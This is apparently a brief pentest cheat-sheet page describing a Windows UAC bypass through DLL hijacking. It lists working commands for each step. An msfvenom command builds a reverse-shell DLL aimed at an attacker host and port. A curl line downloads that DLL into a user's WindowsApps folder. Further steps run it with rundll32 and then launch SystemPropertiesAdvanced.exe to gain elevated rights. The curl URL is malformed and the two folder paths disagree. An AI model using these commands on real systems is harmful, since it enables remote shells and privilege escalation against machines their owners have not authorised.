UAC Bypass
About
UAC Bypass with DLL Hijacking
Review Path Variable
PS C:/> cmd /c echo %PATH%Generate Malicious DLL
msfvenom -p windows/shell_reverse_tcp LHOST=13.13.13.13 LPORT=1337 -f dll > srrstr.dllDownload DLL
curl http:/13.13.13.13:1337/srrstr.dll -O "C:\Users\rio\AppData\Local\Microsoft\Windows Apps\srrstr.dll"Execute Malicious DLL on Target
rundll32 shell32.dll,Control_RunDLL C:\Users\rio\AppData\Local\Microsoft\WindowsApps\srrstr.dllEnsure No Existing rundll32 Instances
Execute SystemPropertiesAdvanced.exe for UAC Bypass
Verify Elevated Privileges
Last updated